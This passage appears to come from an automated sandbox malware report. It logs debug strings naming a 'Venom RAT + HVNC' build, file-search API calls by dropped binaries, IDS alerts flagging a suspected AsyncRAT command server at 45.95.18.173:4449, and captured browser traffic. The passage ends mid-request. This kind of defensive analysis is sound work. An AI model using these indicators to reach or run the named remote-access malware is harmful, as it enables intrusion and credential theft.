                  Source: Binary string: WINLOA~1.PDBwinload_prod.pdb source: curcuma.exe, 00000024.00000003.2136454480.000002428F022000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: \Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\Local State source: curcuma.exe, 00000024.00000003.2137022157.000002428F003000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: \??\C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2 source: curcuma.exe, 00000024.00000003.2192027844.000002428F003000.00000004.00000020.00020000.00000000.sdmp, curcuma.exe, 00000024.00000003.2191841707.000002428F003000.00000004.00000020.00020000.00000000.sdmp, curcuma.exe, 00000024.00000003.2137022157.000002428F003000.00000004.00000020.00020000.00000000.sdmp, curcuma.exe, 00000024.00000003.2191342193.000002428F003000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: bols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831 source: curcuma.exe, 00000024.00000002.2520369587.000002428EFD2000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: RegAsm.pdb source: RegAsm.exe, 0000001E.00000000.1653142985.0000000000E62000.00000002.00000001.01000000.0000000A.sdmp
                  Source: Binary string: rnlmp.pdb source: curcuma.exe, 00000024.00000003.2136705319.000002428F012000.00000004.00000020.00020000.00000000.sdmp, curcuma.exe, 00000024.00000003.2191568059.000002428F010000.00000004.00000020.00020000.00000000.sdmp, curcuma.exe, 00000024.00000003.2192027844.000002428F003000.00000004.00000020.00020000.00000000.sdmp, curcuma.exe, 00000024.00000003.2191342193.000002428F003000.00000004.00000020.00020000.00000000.sdmp, curcuma.exe, 00000024.00000003.2192182151.000002428F010000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: ntdll.pdbUGP source: curcuma.exe, 00000024.00000002.2527246365.0000024290062000.00000004.00000020.00020000.00000000.sdmp, curcuma.exe, 00000024.00000002.2530022848.0000024290662000.00000004.00000020.00020000.00000000.sdmp, curcuma.exe, 00000024.00000002.2536660358.0000024291C6B000.00000004.00000020.00020000.00000000.sdmp, curcuma.exe, 00000024.00000002.2527784177.0000024290261000.00000004.00000020.00020000.00000000.sdmp, curcuma.exe, 00000024.00000002.2522353065.000002428F26C000.00000004.00000020.00020000.00000000.sdmp, curcuma.exe, 00000024.00000002.2523595193.000002428F666000.00000004.00000020.00020000.00000000.sdmp, curcuma.exe, 00000024.00000002.2532167366.0000024290C69000.00000004.00000020.00020000.00000000.sdmp, curcuma.exe, 00000024.00000002.2531363274.0000024290A69000.00000004.00000020.00020000.00000000.sdmp, curcuma.exe, 00000024.00000002.2539552200.000002429266A000.00000004.00000020.00020000.00000000.sdmp, curcuma.exe, 00000024.00000002.2535169251.0000024291663000.00000004.00000020.00020000.00000000.sdmp, curcuma.exe, 00000024.00000002.2530698002.000002429086D000.00000004.00000020.00020000.00000000.sdmp, curcuma.exe, 00000024.00000002.2535663229.0000024291861000.00000004.00000020.00020000.00000000.sdmp, curcuma.exe, 00000024.00000002.2533565678.0000024291069000.00000004.00000020.00020000.00000000.sdmp, curcuma.exe, 00000024.00000002.2540211351.0000024292860000.00000004.00000020.00020000.00000000.sdmp, curcuma.exe, 00000024.00000002.2524330039.000002428F86F000.00000004.00000020.00020000.00000000.sdmp, curcuma.exe, 00000024.00000002.2522991819.000002428F460000.00000004.00000020.00020000.00000000.sdmp, curcuma.exe, 00000024.00000002.2532744179.0000024290E63000.00000004.00000020.00020000.00000000.sdmp, curcuma.exe, 00000024.00000002.2537654371.0000024292064000.00000004.00000020.00020000.00000000.sdmp, curcuma.exe, 00000024.00000002.2534825398.0000024291461000.00000004.00000020.00020000.00000000.sdmp, curcuma.exe, 00000024.00000002.2526786825.000002428FE63000.00000004.00000020.00020000.00000000.sdmp, curcuma.exe, 00000024.00000002.2534240303.000002429126B000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2wek source: curcuma.exe, 00000024.00000003.2137022157.000002428F003000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\profiles.ini source: curcuma.exe, 00000024.00000003.2454896815.000002428F089000.00000004.00000020.00020000.00000000.sdmp, curcuma.exe, 00000024.00000003.2455612672.000002428F08B000.00000004.00000020.00020000.00000000.sdmp, curcuma.exe, 00000024.00000003.2454950274.000002428F089000.00000004.00000020.00020000.00000000.sdmp, curcuma.exe, 00000024.00000003.2455235376.000002428F089000.00000004.00000020.00020000.00000000.sdmp, curcuma.exe, 00000024.00000003.2455005211.000002428F089000.00000004.00000020.00020000.00000000.sdmp, curcuma.exe, 00000024.00000003.2455292605.000002428F089000.00000004.00000020.00020000.00000000.sdmp, curcuma.exe, 00000024.00000003.2454574364.000002428F089000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: r\AppData\Local\Temp\Symbols\ntkrnlmp.pdbR7 source: curcuma.exe, 00000024.00000003.2136705319.000002428F012000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: winload_prod.pdb source: curcuma.exe, 00000024.00000003.2136705319.000002428F012000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: \??\C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\profiles.inic source: curcuma.exe, 00000024.00000003.2454896815.000002428F089000.00000004.00000020.00020000.00000000.sdmp, curcuma.exe, 00000024.00000003.2454950274.000002428F089000.00000004.00000020.00020000.00000000.sdmp, curcuma.exe, 00000024.00000003.2455235376.000002428F089000.00000004.00000020.00020000.00000000.sdmp, curcuma.exe, 00000024.00000003.2455005211.000002428F089000.00000004.00000020.00020000.00000000.sdmp, curcuma.exe, 00000024.00000003.2454574364.000002428F089000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: C:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\profiles.ini source: curcuma.exe, 00000024.00000003.2454896815.000002428F089000.00000004.00000020.00020000.00000000.sdmp, curcuma.exe, 00000024.00000003.2454574364.000002428F089000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb\01AB90 source: curcuma.exe, 00000024.00000003.2455612672.000002428F08B000.00000004.00000020.00020000.00000000.sdmp, curcuma.exe, 00000024.00000003.2455292605.000002428F089000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: ]\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2^ source: curcuma.exe, 00000024.00000002.2520369587.000002428EFD2000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: mp.pdb source: curcuma.exe, 00000024.00000003.2137022157.000002428F003000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: bols\winload_prod.pdb source: curcuma.exe, 00000024.00000003.2457464322.000002428EFDA000.00000004.00000020.00020000.00000000.sdmp, curcuma.exe, 00000024.00000003.2455703181.000002428EFDA000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: C:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831 source: curcuma.exe, 00000024.00000003.2137022157.000002428F003000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: \??\C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\profiles.ini source: curcuma.exe, 00000024.00000003.2454896815.000002428F089000.00000004.00000020.00020000.00000000.sdmp, curcuma.exe, 00000024.00000003.2454950274.000002428F089000.00000004.00000020.00020000.00000000.sdmp, curcuma.exe, 00000024.00000003.2455235376.000002428F089000.00000004.00000020.00020000.00000000.sdmp, curcuma.exe, 00000024.00000003.2455005211.000002428F089000.00000004.00000020.00020000.00000000.sdmp, curcuma.exe, 00000024.00000003.2454574364.000002428F089000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: a\Local\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1n source: curcuma.exe, 00000024.00000003.2455612672.000002428F08B000.00000004.00000020.00020000.00000000.sdmp, curcuma.exe, 00000024.00000003.2455292605.000002428F089000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: \??\C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2I" source: curcuma.exe, 00000024.00000003.2192027844.000002428F003000.00000004.00000020.00020000.00000000.sdmp, curcuma.exe, 00000024.00000003.2194578503.000002428F003000.00000004.00000020.00020000.00000000.sdmp, curcuma.exe, 00000024.00000003.2192812190.000002428F003000.00000004.00000020.00020000.00000000.sdmp, curcuma.exe, 00000024.00000003.2193070120.000002428F003000.00000004.00000020.00020000.00000000.sdmp, curcuma.exe, 00000024.00000003.2191841707.000002428F003000.00000004.00000020.00020000.00000000.sdmp, curcuma.exe, 00000024.00000003.2137022157.000002428F003000.00000004.00000020.00020000.00000000.sdmp, curcuma.exe, 00000024.00000003.2191342193.000002428F003000.00000004.00000020.00020000.00000000.sdmp, curcuma.exe, 00000024.00000003.2192580961.000002428F003000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: "winload_prod.pdb source: curcuma.exe, 00000024.00000003.2136705319.000002428EFDE000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb source: curcuma.exe, 00000024.00000003.2136705319.000002428F012000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: \??\C:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831 source: curcuma.exe, 00000024.00000003.2192027844.000002428F003000.00000004.00000020.00020000.00000000.sdmp, curcuma.exe, 00000024.00000003.2194578503.000002428F003000.00000004.00000020.00020000.00000000.sdmp, curcuma.exe, 00000024.00000003.2192812190.000002428F003000.00000004.00000020.00020000.00000000.sdmp, curcuma.exe, 00000024.00000003.2193070120.000002428F003000.00000004.00000020.00020000.00000000.sdmp, curcuma.exe, 00000024.00000003.2191841707.000002428F003000.00000004.00000020.00020000.00000000.sdmp, curcuma.exe, 00000024.00000003.2137022157.000002428F003000.00000004.00000020.00020000.00000000.sdmp, curcuma.exe, 00000024.00000003.2191342193.000002428F003000.00000004.00000020.00020000.00000000.sdmp, curcuma.exe, 00000024.00000003.2192580961.000002428F003000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: \??\C:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A58315"G source: curcuma.exe, 00000024.00000003.2192027844.000002428F003000.00000004.00000020.00020000.00000000.sdmp, curcuma.exe, 00000024.00000003.2194578503.000002428F003000.00000004.00000020.00020000.00000000.sdmp, curcuma.exe, 00000024.00000003.2192812190.000002428F003000.00000004.00000020.00020000.00000000.sdmp, curcuma.exe, 00000024.00000003.2193070120.000002428F003000.00000004.00000020.00020000.00000000.sdmp, curcuma.exe, 00000024.00000003.2191841707.000002428F003000.00000004.00000020.00020000.00000000.sdmp, curcuma.exe, 00000024.00000003.2137022157.000002428F003000.00000004.00000020.00020000.00000000.sdmp, curcuma.exe, 00000024.00000003.2191342193.000002428F003000.00000004.00000020.00020000.00000000.sdmp, curcuma.exe, 00000024.00000003.2192580961.000002428F003000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: bols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A58313 source: curcuma.exe, 00000024.00000002.2520369587.000002428EFD2000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: jC:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\<,[ source: curcuma.exe, 00000024.00000003.2137022157.000002428F003000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: ntdll.pdb source: curcuma.exe, 00000024.00000002.2527246365.0000024290062000.00000004.00000020.00020000.00000000.sdmp, curcuma.exe, 00000024.00000002.2530022848.0000024290662000.00000004.00000020.00020000.00000000.sdmp, curcuma.exe, 00000024.00000002.2536660358.0000024291C6B000.00000004.00000020.00020000.00000000.sdmp, curcuma.exe, 00000024.00000002.2527784177.0000024290261000.00000004.00000020.00020000.00000000.sdmp, curcuma.exe, 00000024.00000002.2522353065.000002428F26C000.00000004.00000020.00020000.00000000.sdmp, curcuma.exe, 00000024.00000002.2523595193.000002428F666000.00000004.00000020.00020000.00000000.sdmp, curcuma.exe, 00000024.00000002.2532167366.0000024290C69000.00000004.00000020.00020000.00000000.sdmp, curcuma.exe, 00000024.00000002.2531363274.0000024290A69000.00000004.00000020.00020000.00000000.sdmp, curcuma.exe, 00000024.00000002.2539552200.000002429266A000.00000004.00000020.00020000.00000000.sdmp, curcuma.exe, 00000024.00000002.2535169251.0000024291663000.00000004.00000020.00020000.00000000.sdmp, curcuma.exe, 00000024.00000002.2530698002.000002429086D000.00000004.00000020.00020000.00000000.sdmp, curcuma.exe, 00000024.00000002.2535663229.0000024291861000.00000004.00000020.00020000.00000000.sdmp, curcuma.exe, 00000024.00000002.2533565678.0000024291069000.00000004.00000020.00020000.00000000.sdmp, curcuma.exe, 00000024.00000002.2540211351.0000024292860000.00000004.00000020.00020000.00000000.sdmp, curcuma.exe, 00000024.00000002.2524330039.000002428F86F000.00000004.00000020.00020000.00000000.sdmp, curcuma.exe, 00000024.00000002.2522991819.000002428F460000.00000004.00000020.00020000.00000000.sdmp, curcuma.exe, 00000024.00000002.2532744179.0000024290E63000.00000004.00000020.00020000.00000000.sdmp, curcuma.exe, 00000024.00000002.2537654371.0000024292064000.00000004.00000020.00020000.00000000.sdmp, curcuma.exe, 00000024.00000002.2534825398.0000024291461000.00000004.00000020.00020000.00000000.sdmp, curcuma.exe, 00000024.00000002.2526786825.000002428FE63000.00000004.00000020.00020000.00000000.sdmp, curcuma.exe, 00000024.00000002.2534240303.000002429126B000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: \Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2 source: curcuma.exe, 00000024.00000002.2520369587.000002428EFD2000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: pnaclmp.pdb source: curcuma.exe, 00000024.00000003.2137022157.000002428F003000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: Y\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831hO+ source: curcuma.exe, 00000024.00000002.2520369587.000002428EFD2000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: \??\C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2#"I source: curcuma.exe, 00000024.00000003.2192027844.000002428F003000.00000004.00000020.00020000.00000000.sdmp, curcuma.exe, 00000024.00000003.2191841707.000002428F003000.00000004.00000020.00020000.00000000.sdmp, curcuma.exe, 00000024.00000003.2137022157.000002428F003000.00000004.00000020.00020000.00000000.sdmp, curcuma.exe, 00000024.00000003.2191342193.000002428F003000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: RegAsm.pdb4 source: RegAsm.exe, 0000001E.00000000.1653142985.0000000000E62000.00000002.00000001.01000000.0000000A.sdmp
                  Source: Binary string: Temp\Symbols\ntkrnlmp.pdbD source: curcuma.exe, 00000024.00000003.2455703181.000002428EFDA000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2 source: curcuma.exe, 00000024.00000002.2520369587.000002428EFD2000.00000004.00000020.00020000.00000000.sdmp, curcuma.exe, 00000024.00000003.2137022157.000002428F003000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: D:\Backup\Venom RAT + HVNC Finally Released 12.03.2024 Fixed Logger\HVNCDll\obj\Release\hvnc.pdba source: RegAsm.exe, 0000001E.00000002.2513996605.0000000001302000.00000040.00000400.00020000.00000000.sdmp
                  Source: Binary string: \Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831 source: curcuma.exe, 00000024.00000002.2520369587.000002428EFD2000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: winload_prod.pdbs source: curcuma.exe, 00000024.00000003.2136705319.000002428F012000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: D:\Backup\Venom RAT + HVNC Finally Released 12.03.2024 Fixed Logger\HVNCDll\obj\Release\hvnc.pdb source: RegAsm.exe, 0000001E.00000002.2513996605.0000000001302000.00000040.00000400.00020000.00000000.sdmp
                  Source: Binary string: xC:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb source: curcuma.exe, 00000024.00000003.2136705319.000002428F012000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: \??\C:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\profiles.ini source: curcuma.exe, 00000024.00000003.2454896815.000002428F089000.00000004.00000020.00020000.00000000.sdmp, curcuma.exe, 00000024.00000003.2454950274.000002428F089000.00000004.00000020.00020000.00000000.sdmp, curcuma.exe, 00000024.00000003.2455005211.000002428F089000.00000004.00000020.00020000.00000000.sdmp, curcuma.exe, 00000024.00000003.2454574364.000002428F089000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\ source: curcuma.exe, 00000024.00000003.2137022157.000002428F003000.00000004.00000020.00020000.00000000.sdmp
                  Source: C:\Users\user\Desktop\ADFoyxP.exe Code function: 0_2_004062D5 FindFirstFileW,FindClose
                  Source: C:\Users\user\Desktop\ADFoyxP.exe Code function: 0_2_00402E18 FindFirstFileW
                  Source: C:\Users\user\Desktop\ADFoyxP.exe Code function: 0_2_00406C9B DeleteFileW,lstrcatW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,RemoveDirectoryW
                  Source: C:\Users\user\AppData\Local\TradeSecure Innovations\TradeHub.com Code function: 27_2_003DA087 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose
                  Source: C:\Users\user\AppData\Local\TradeSecure Innovations\TradeHub.com Code function: 27_2_003DA1E2 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose
                  Source: C:\Users\user\AppData\Local\TradeSecure Innovations\TradeHub.com Code function: 27_2_003CE472 lstrlenW,GetFileAttributesW,FindFirstFileW,FindClose
                  Source: C:\Users\user\AppData\Local\TradeSecure Innovations\TradeHub.com Code function: 27_2_003DA570 FindFirstFileW,Sleep,FindNextFileW,FindClose
                  Source: C:\Users\user\AppData\Local\TradeSecure Innovations\TradeHub.com Code function: 27_2_0039C622 FindFirstFileExW
                  Source: C:\Users\user\AppData\Local\TradeSecure Innovations\TradeHub.com Code function: 27_2_003D66DC FindFirstFileW,FindNextFileW,FindClose
                  Source: C:\Users\user\AppData\Local\TradeSecure Innovations\TradeHub.com Code function: 27_2_003D7333 FindFirstFileW,FindClose
                  Source: C:\Users\user\AppData\Local\TradeSecure Innovations\TradeHub.com Code function: 27_2_003D73D4 FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,FileTimeToSystemTime,FileTimeToSystemTime
                  Source: C:\Users\user\AppData\Local\TradeSecure Innovations\TradeHub.com Code function: 27_2_003CD921 FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose
                  Source: C:\Users\user\AppData\Local\TradeSecure Innovations\TradeHub.com Code function: 27_2_003CDC54 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose
                  Source: C:\Windows\SysWOW64\cmd.exe File opened: C:\Users\user\AppData\Local\Temp\353090\
                  Source: C:\Windows\SysWOW64\cmd.exe File opened: C:\Users\user\AppData\Local\Temp\
                  Source: C:\Windows\SysWOW64\cmd.exe File opened: C:\Users\user\AppData\Local\
                  Source: C:\Windows\SysWOW64\cmd.exe File opened: C:\Users\user\AppData\Local\Temp\353090
                  Source: C:\Windows\SysWOW64\cmd.exe File opened: C:\Users\user\
                  Source: C:\Windows\SysWOW64\cmd.exe File opened: C:\Users\user\AppData\
                  Source: chrome.exe Memory has grown: Private usage: 1MB later: 94MB

                  Networking

                  Source: Network traffic Suricata IDS: 2842478 - Severity 1 - ETPRO JA3 Hash - Suspected ASYNCRAT Server Cert (ja3s) : 45.95.18.173:4449 -> 192.168.2.6:49690
                  Source: Network traffic Suricata IDS: 2842478 - Severity 1 - ETPRO JA3 Hash - Suspected ASYNCRAT Server Cert (ja3s) : 45.95.18.173:4449 -> 192.168.2.6:62054
                  Source: global traffic TCP traffic: 192.168.2.6:49690 -> 45.95.18.173:4449
                  Source: global traffic TCP traffic: 192.168.2.6:62052 -> 1.1.1.1:53
                  Source: Joe Sandbox View IP Address: 2.22.242.105
                  Source: Joe Sandbox View IP Address: 52.182.143.211
                  Source: Joe Sandbox View IP Address: 23.219.82.75
                  Source: Joe Sandbox View ASN Name: SHOCK-1US
                  Source: Joe Sandbox View JA3 fingerprint: a0e9f5d64349fb13191bc781f81f42e1
                  Source: Network traffic Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.6:62057 -> 104.21.32.1:443
                  Source: Network traffic Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.6:62055 -> 104.21.32.1:443
                  Source: Network traffic Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.6:62056 -> 104.21.32.1:443
                  Source: Network traffic Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.6:62184 -> 104.21.32.1:443
                  Source: unknown TCP traffic detected without corresponding DNS query: 20.42.65.91
                  Source: unknown TCP traffic detected without corresponding DNS query: 142.250.184.227
                  Source: unknown TCP traffic detected without corresponding DNS query: 2.17.190.73
                  Source: unknown TCP traffic detected without corresponding DNS query: 45.95.18.173
                  Source: unknown TCP traffic detected without corresponding DNS query: 1.1.1.1
                  Source: C:\Users\user\AppData\Local\TradeSecure Innovations\TradeHub.com Code function: 27_2_003DD889 InternetReadFile,SetEvent,GetLastError,SetEvent
                  Source: global traffic HTTP traffic detected:
                      GET /complete/search?client=chrome-omni&gs_ri=chrome-ext-ansg&xssi=t&q=&oit=0&oft=1&pgcl=20&gs_rn=42&sugkey=AIzaSyA2KlwBX3mkFo30om9LUFYQhpqLoa_BNhE HTTP/1.1
                      Host: www.google.com
                      Connection: keep-alive
                      X-Client-Data: CO6MywE=
                      Sec-Fetch-Site: none
                      Sec-Fetch-Mode: no-cors
                      Sec-Fetch-Dest: empty
                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36
                      Accept-Encoding: gzip, deflate, br, zstd
                      Accept-Language: en-US,en;q=0.9
                  Source: global traffic HTTP traffic detected:
                      GET /async/ddljson?async=ntp:2 HTTP/1.1
                      Host: www.google.com
                      Connection: keep-alive
                      Sec-Fetch-Site: none
                      Sec-Fetch-Mode: no-cors
                      Sec-Fetch-Dest: empty
                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36
                      Accept-Encoding: gzip, deflate, br, zstd
                      Accept-Language: en-US,en;q=0.9
                  Source: global traffic HTTP traffic detected:
                      GET /async/newtab_ogb?hl=en-US&async=fixed:0 HTTP/1.1
                      Host: www.google.com
                      Connection: keep-alive
                      X-Client-Data: CO6MywE=
                      Sec-Fetch-Site: cross-site
                      Sec-Fetch-Mode: no-cors
                      Sec-Fetch-Dest: empty
                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36
                      Accept-Encoding: gzip, deflate, br, zstd
                      Accept-Language: en-US,en;q=0.9
                  Source: global traffic HTTP traffic detected:
                      GET /async/newtab_promos HTTP/1.1
                      Host: www.google.com
                      Connection: keep-alive
                      Sec-Fetch-Site: cross-site
                      Sec-Fetch-Mode: no-cors
                      Sec-Fetch-Dest: empty
                      Sec-Fetch-Storage-Access: active
                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36
                      Accept-Encoding: gzip, deflate, br, zstd
                      Accept-Language: en-US,en;q=0.9
                  Source: global traffic HTTP traffic detected:
                      GET /edge/ntp?locale=en-GB&title=New%20tab&dsp=1&sp=Bing&isFREModalBackground=1&startpage=1&PC=U531 HTTP/1.1
                      Host: ntp.msn.com
                      Connection: keep-alive
                      sec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                      sec-ch-ua-mobile: ?0
                      sec-ch-ua-platform: "Windows"
                      sec-ch-ua-platform-version: "10.0.0"
                      Upgrade-Insecure-Requests: 1
                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.55
                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                      sec-edge-ntp: {"back_block":0,"bg_cur":{},"bg_img_typ":"bing","exp":["msQuickLinksDefaultOneRow","msShoppingWebAssistOnNtp","msShoppingHistogramsOnNtp","msEnableWinHPNewTabBackButtonFocusAndClose","msCustomMaxQuickLinks","msMaxQuickLinksAt20","msAllowThemeInstallationFromChromeStore","msEdgeSplitWindowPrivateTarget","msEdgeSplitWindowLinkMode"],"feed":0,"feed_dis":"peek","layout":1,"quick_links_opt":1,"sel_feed_piv":"","show_greet":true,"vt_opened":false}
                      Sec-Fetch-Site: none
                      Sec-Fetch-Mode: navigate
                      Sec-Fetch-User: ?1
                      Sec-Fetch-Dest: document
                      Accept-Encoding: gzip, deflate, br
                      Accept-Language: en-GB,en;q=0.9,en-US;q=0.8
                  Source: global traffic HTTP traffic detected:
                      GET /bundles/v1/edgeChromium/latest/SSR-extension.867cdfd625d830718faf.js HTTP/1.1
                      Host: ntp.msn.com
                      Connection: keep-alive
                      sec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                      Origin: https://ntp.msn.com
                      sec-ch-viewport-height: 876
                      sec-ch-ua-arch: "x86"
                      sec-ch-viewport-width: 1232
                      sec-ch-ua-platform-version: "10.0.0"
                      downlink: 1.45
                      sec-ch-ua-full-version-list: "Microsoft Edge";v="117.0.2045.55", "Not;A=Brand";v="8.0.0.0", "Chromium";v="117.0.5938.150"
                      sec-ch-ua-bitness: "64"
                      sec-ch-ua-model: ""
                      sec-ch-prefers-color-scheme: light
                      sec-ch-ua-platform: "Windows"
                      device-memory: 8
                      rtt: 400
                      sec-ch-ua-mobile: ?0
                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.55
                      sec-ch-ua-full-version: "117.0.2045.55"
                      sec-ch-dpr: 1
                      ect: 3g
                      Accept: */*
                      sec-edge-ntp: {"back_block":0,"bg_cur":{},"bg_img_typ":"bing","exp":["msQuickLinksDefaultOneRow","msShoppingWebAssistOnNtp","msShoppingHistogramsOnNtp","msEnableWinHPNewTabBackButtonFocusAndClose","msCustomMaxQuickLinks","msMaxQuickLinksAt20","msAllowThemeInstallationFromChromeStore","msEdgeSplitWindowPrivateTarget","msEdgeSplitWindowLinkMode"],"feed":0,"feed_dis":"peek","layout":1,"quick_links_opt":1,"sel_feed_piv":"","show_greet":true,"vt_opened":false}
                      Sec-Fetch-Site: same-origin
                      Sec-Fetch-Mode: cors
                      Sec-Fetch-Dest: script
                      Referer: https://ntp.msn.com/edge/ntp?locale=en-GB&title=New%20tab&dsp=1&sp=Bing&isFREModalBackground=1&startpage=1&PC=U531
                      Accept-Encoding: gzip, deflate, br
                      Accept-Language: en-GB,en;q=0.9,en-US;q=0.8
                      Cookie: _C_ETH=1; sptmarket=en-GB||us|en-us|en-us|en||cf=8|RefA=674E66C55A9344F481D3165612FD20C7.RefC=2025-03-07T16:34:43Z; USRLOC=; MUID=3B61B35AD2B06E2C0F4DA6F2D3A26FDA; MUIDB=3B61B35AD2B06E2C0F4DA6F2D3A26FDA; _EDGE_S=F=1&SID=3B3F921E4B7A6BB111A987B64AE56A98; _EDGE_V=1
                  Source: global traffic HTTP traffic detected:
                      GET /bundles/v1/edgeChromium/latest/web-worker.948ffa5ea2d441a35f55.js HTTP/1.1
                      Host: ntp.msn.com
